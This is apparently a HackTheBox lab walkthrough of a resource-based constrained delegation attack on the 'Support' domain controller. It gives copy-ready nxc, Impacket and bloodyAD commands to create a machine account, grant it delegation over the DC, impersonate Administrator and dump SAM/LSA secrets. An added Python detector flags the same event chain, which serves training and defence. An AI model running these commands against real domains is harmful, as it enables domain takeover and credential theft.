@RajChowdhury240
Created January 17, 2026 22:52
RBCD Using NXC

For this demo I will be using the machine Support from HackTheBox.


Let's resolve the target's domain name and add it to our /etc/hosts file:

❯ sudo nxc smb 10.129.251.96 -u 'Guest' -p '' --generate-hosts-file /etc/hosts

Nmap Scan

❯ rustscan -a support.htb

❯ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49679,49754 -sC -sV -Pn support.htb

According to the rustscan and nmap results, the following ports are open:

| Ports Open | Service |
|---|---|
| 53 | Simple DNS Plus |
| 88,464 | Kerberos |
| 135,593,49664,49668,49674,49679,49703,57579,58137 | RPC |
| 139,445 | SMB |
| 389,636,3268,3269 | LDAP |
| 5985 | WinRM |

At this stage, let's say we have a set of credentials for a compromised low-privilege user:

support : Ironside47pleasure40Watchful

Let's check the machine account quota first:

❯ nxc ldap support.htb -u support -p 'Ironside47pleasure40Watchful' -M maq

OK, sweet, that means we can create a computer. But first let's take a look at the BloodHound data, which I will gather with RustHound-CE:

cargo install rusthound-ce

https://github.com/g0h4n/RustHound-CE

❯ rusthound-ce -d support.htb -u support@support.htb -z -c

Our currently owned user is support. We will mark it as owned and check whether it has any outbound control edges:


The attack (high level):

  1. We are going to create a fake computer on the domain.
  2. Configure RBCD by setting the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to allow our computer to act on behalf of the DC.
  3. Perform an S4U attack to get a Kerberos ticket on behalf of the Administrator.
  4. Pass the admin's ticket to get RCE on the target.

Step 1 : Create a Fake Computer (Machine) Account

Using Impacket:

❯ addcomputer.py -computer-name 'raj' -computer-pass 'hackme' -dc-ip 10.129.251.96 support.htb/support:Ironside47pleasure40Watchful

Alternative: using bloodyAD to create a computer:

❯ bloodyAD --host 10.129.254.78 -u support -p 'Ironside47pleasure40Watchful' -d support.htb add computer 'raj' 'hackme'

My created fake computer account - raj$ : hackme

Step 2 : Give RBCD Rights to Your Fake Computer Account

Using Impacket:

❯ rbcd.py -delegate-from 'raj$' -delegate-to 'DC$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'

Alternative: using bloodyAD to grant RBCD rights:

❯ bloodyAD --host 10.129.254.78 -u support -p 'Ironside47pleasure40Watchful' -d support.htb add rbcd 'DC$' 'raj$'
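Steps 1 and 2 seen from the defender's side, as an added example that is not part of the original gist: the computer account creation is logged as Security event 4741 and the RBCD attribute write as event 5136 (assuming directory service change auditing covers the computer objects), so one principal doing both within a short window is worth an alert. The event dicts are constructed, simplified samples, and `find_rbcd_chains`, `allowed_writers` and the 24-hour window are hypothetical names and values.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
WINDOW = timedelta(hours=24)  # assumed correlation window

# Constructed sample events (simplified dicts, not a real log export).
# Field names follow Security events 4741 (computer created) and 5136 (object modified).
SAMPLE_EVENTS = [
    {"id": 4741, "time": "2026-01-17T22:10:05", "SubjectUserName": "support",
     "TargetUserName": "raj$"},
    {"id": 5136, "time": "2026-01-17T22:12:40", "SubjectUserName": "support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "Value Added"},
    {"id": 4741, "time": "2026-01-17T09:00:00", "SubjectUserName": "helpdesk-join",
     "TargetUserName": "WS042$"},
    {"id": 5136, "time": "2026-01-17T09:30:00", "SubjectUserName": "helpdesk-join",
     "ObjectDN": "CN=WS042,CN=Computers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "Value Added"},
]

def find_rbcd_chains(events, window=WINDOW, allowed_writers=frozenset()):
    """Return findings where one principal created a computer account and then
    wrote the RBCD attribute on a different computer object within `window`."""
    created = {}   # lowercased creator -> list of (time, new machine account)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        who = ev["SubjectUserName"].lower()
        if ev["id"] == 4741:
            created.setdefault(who, []).append((when, ev["TargetUserName"]))
        elif (ev["id"] == 5136
              and ev["AttributeLDAPDisplayName"].lower() == RBCD_ATTR
              and ev["OperationType"] == "Value Added"
              and who not in allowed_writers):
            for made_at, machine in created.get(who, []):
                own_cn = "cn=" + machine.rstrip("$").lower() + ","
                if when - made_at <= window and not ev["ObjectDN"].lower().startswith(own_cn):
                    findings.append({"actor": who, "new_machine": machine,
                                     "target": ev["ObjectDN"], "time": ev["time"]})
    return findings

if __name__ == "__main__":
    for f in find_rbcd_chains(SAMPLE_EVENTS):
        print(f"[!] {f['actor']} created {f['new_machine']} then set RBCD on {f['target']}")
```

On the sample data only the support / raj$ / DC chain is flagged; the helpdesk join account is not, because it never touches the RBCD attribute.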

Step 3 : Get the silver ticket of the target impersonation user (e.g. Administrator) using nxc

❯ nxc smb support.htb -u 'raj$' -p 'hackme' --delegate Administrator

❯ nxc smb support.htb -u 'raj$' -p 'hackme' --delegate Administrator --sam --lsa

Bling bling, we got the silver ticket of Administrator as well as the NT hash of Administrator!

Alternative: getting the silver ticket the normal way, using getST.py:

❯ getST.py support.htb/'raj$':'hackme' -spn cifs/dc.support.htb -impersonate Administrator

Hope you enjoyed the trick!
